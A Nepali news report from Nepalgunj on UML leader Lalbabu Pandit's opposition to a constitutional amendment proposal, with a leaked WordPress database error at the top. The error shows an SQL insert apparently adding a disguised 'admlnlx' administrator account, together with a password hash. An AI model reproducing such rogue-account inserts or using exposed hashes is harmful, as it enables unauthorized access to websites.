WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B54Gfrkzk.0XLpShiekWY0qPDaCTbT0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 17:01:00', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,मंसिर २५-
एमाले नेता तथा पुर्व सामान्य प्रशासन मन्त्रि लालवावु पण्डितले कालान्तरमा मधेशलाई एक मधेश एक प्रदेश वनाउने डिजाइनका साथ संसोधन प्रस्ताव ल्याइएको वताउनु भएको छ ।उहांले यो संसोधन प्रस्तावले सवै पक्षको माग संवोधन गर्न नसक्ने भएकाले फिर्ता लैजानुनै उपयुक्त वाटो हुने वताउनु भयो । प्रेस चौतारी बांके शाखाले आज नेपालगन्जमा आयोजना गरेको पत्रकार सम्मेलनमा वोल्दै पण्डितले देशमा संविधान कार्यान्वयन पहिलो प्रथामिकतामा रहेकाले त्यसका लागी निर्वाचनमा जानुपर्ने वताउनुभयो ।
पण्डितले अहिलेको सरकारले संविधानको वाटो भन्दापनि फरक तरिकाले संविधान संसोधन प्रस्ताव दर्ता गरेको वताउनु भयो ।यसरी आएको संविधान संसोधनको प्रस्ताव दर्ता गर्नु भनेको संविधान च्यात्नु र जलाउनुसरह हुने उहांको तर्क छ ।देश विदेशका केहि शक्ति संविधान कार्यान्वयन हुन नदिन लागिपरेका छन्,त्यसको एउटा रुप संविधान संसोधन पनि हो,उहांले भन्नुभयो ।देश भित्रका कुरा भारतिय दुतावासमा गएर गर्नु दुखद भएको भन्दै उहांले आन्तरिक मामिला आफै हल गर्नुपर्ने वताउनु भयो । उहांले अन्य देशको हस्तक्षेप स्विकार्य नहुने भन्दै कस्मीर र गोर्खाल्याण्डको पक्षमा कहिल्यै नवोलेको वताउनु भयो ।
अर्को एक प्रसंगमा नेता पण्डितले मधेशमा एमालेको झन जनमत वढेको दावी गर्नुभयो । उहांले एमाले मधेशविरोधी पार्टी भन्नु अन्ध क्षेत्रियवाद र एकल जातियवादको उपज भएको आरोप लगाउनु भयो ।एमाले जुन वेला सरकारमा गएका छ त्यो वेला मधेशमा धेरै कार्यक्रम आएका छन् एमाले कसरी मधेश विरोधी पार्टी भयो पण्डितले प्रश्न गर्नुभयो ।